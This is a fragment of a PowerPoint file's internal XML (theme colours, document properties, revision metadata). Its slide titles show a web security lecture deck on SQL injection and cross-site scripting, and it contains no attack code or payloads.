            <a:ext cx="1240078" cy="178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19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Injection Flaws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7839D-A323-47F3-909F-5484993996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2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aEgROsvYJr9WlM1wRei0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R6xg7Dt6H5Yz7z7DT3FG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2pIhzqOomffMJobGx7W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h0mnJPcxXhtguRpmTGS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SMneHn7yrNI37IUbHZb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isUkgadgIqnX8zZu7Ppp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yrKHrIYTvM1UtVkn7Xkb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F9AlbcRmpT8DUszyJvhO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We54aJHs4EAfMB75wL1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LQ0RNyeOUgm4dmg727F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2EGYrDYvMNeOse3jW8e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2HWuJV9V0smEon833pS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jTHnLPpJTtpjhOmaO7APo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oT13JbwJyJILYBGNzM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PuaqH871DqlPjSYRNl0I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y5AbdqNgCBf0UJBmA3u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nSs6CO0dMam9JBk6XUBQ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3R47cZpEszDac84BBM3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Ra7ggC9TgYEEpfxHOdmv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6r8XTiZ36SNaZT0VJNv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vyJO4UYPuVYh4G8iJQUc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DbSJvOQYWtWxGbyfln2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vo4Ium2FZAvgeaSXL2Av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dmHq0BQ1hpzXQZzFl9NZ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3wRDPQI7iQcqObivc0XF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zPbYz0efPNzsEU8Y1bzh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7EzKt2EAZdYPGW2rQgHT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oQmxoneZL6N5saCe5YAE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DXY5xaURne6gJoWDgm0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BtRPCaIjobNfIzphGOR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mUTP9kjiP9IBlueIyK9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VstFmeZFbADCK7WVM1n0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Ew7eV3Yf65l1rspaM6k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tY7C9JbeBmvHCbxp1qMT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4ZAniMMJL3JzNWx8jWGWt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JGtwBehFtG5s8EyLctm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REtCENoVH5wIQHOgavto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TIuptKbut6eYrOP3ZAuhy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VqNQWWiRQT1YWYca2dr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hJpSYcbVZ7HUIyZGTeyaf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5pQS4Mpr36K1EGnYXJ7W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k4dpdt8ZS4JTEZ268ovx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HUjiVgO3ixj5MFEzWj4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L2oWRBIriIJUwvUadJ4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879Xa5DQyah1pW5lDQq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llUgrtPzeZmtp9hUZodl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AmR89EL5l9FQpGuGq7SR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q6mDfekQFA6KxoijaO8D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NzJAqiX5sYaQ0q1N1vR0j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giWWh8NI3U59CxC3PVnKd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WTxXgw8ihDTNirDu1PiJV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QOtaYFWDyNEm2okRhzLD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PebplUxstGG8G9MlaCk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E4A5GY0a9CjBYfZzk25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YGUHa4Vo8jrTPA6Ofdzri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ZyBZkxJBNCN0cZvZL09X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O5axlBhiUfGFoGnvT5L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H9ETK5OwD1sC6C0wzNQ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9VI8RHFmxuKWn0TsQcto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dLAKvmvXail30JaCd7Qh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R9fZD7XEx72tHWx6cjRz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Aj0ahdYmykbgTqvvJoZ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0V1Wiyq8TI2mgrCoimzh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l98tW482U5y9yxXQxU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1cXzmRPhqG21gPc4NxFz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DQWsNaB3icYR7VvmIgcD"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="template">
  <a:themeElements>
    <a:clrScheme name="DBrumley201205 1">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="990000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E3E1E1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="990000"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E47932"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00709E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="595A5A"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="009446"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="936241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 cap="flat" cmpd="sng">
          <a:miter lim="800000"/>
        </a:ln>
      </a:spPr>
      <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="1">
        <a:noAutofit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr sz="2800" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:defRPr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 w="57150">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill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7448</TotalTime>
  <Words>3752</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>587</Paragraphs>
  <Slides>48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Cambria</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Zapf Dingbats</vt:lpstr>
      <vt:lpstr>template</vt:lpstr>
      <vt:lpstr>Web Security </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web Application Overview</vt:lpstr>
      <vt:lpstr>Web Security Overview</vt:lpstr>
      <vt:lpstr>Web Security Overview</vt:lpstr>
      <vt:lpstr>Web Security Overview</vt:lpstr>
      <vt:lpstr>Web Security Overview</vt:lpstr>
      <vt:lpstr>Web Security Overview</vt:lpstr>
      <vt:lpstr>Injection Flaws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Getting a Shell</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>CardSystems Attack</vt:lpstr>
      <vt:lpstr>SQL Primer</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Basic Queries</vt:lpstr>
      <vt:lpstr>Example Query</vt:lpstr>
      <vt:lpstr>Join Example</vt:lpstr>
      <vt:lpstr>Tautologies</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Even worse</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reversing Table Layout</vt:lpstr>
      <vt:lpstr>Probing Number of Columns</vt:lpstr>
      <vt:lpstr>Probing Number of Columns</vt:lpstr>
      <vt:lpstr>Probing Column Names</vt:lpstr>
      <vt:lpstr>Querying extra tables with UNION</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Error Messages</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Parameterized Queries with Bound Parameters</vt:lpstr>
      <vt:lpstr>Safety</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Basic Browser Model</vt:lpstr>
      <vt:lpstr>Document Object Model</vt:lpstr>
      <vt:lpstr>Document Object Model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Darpa Presentation</dc:title>
  <dc:creator>ed</dc:creator>
  <cp:lastModifiedBy>EMMY WAHYUNINGTYAS</cp:lastModifiedBy>
  <cp:revision>1459</cp:revision>
  <cp:lastPrinted>2012-09-29T01:49:14Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-11-02T18:57:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-21T11:58:20Z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false</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Google.Documents.DocumentId">
    <vt:lpwstr>11L1CS3lWunNfTuci5gPLtht4ZjOn7gyfIKyZn-f7p20</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Google.Documents.RevisionId">
    <vt:lpwstr>13701622749194124332</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Google.Documents.PreviousRevisionId">
    <vt:lpwstr>17594234182614114890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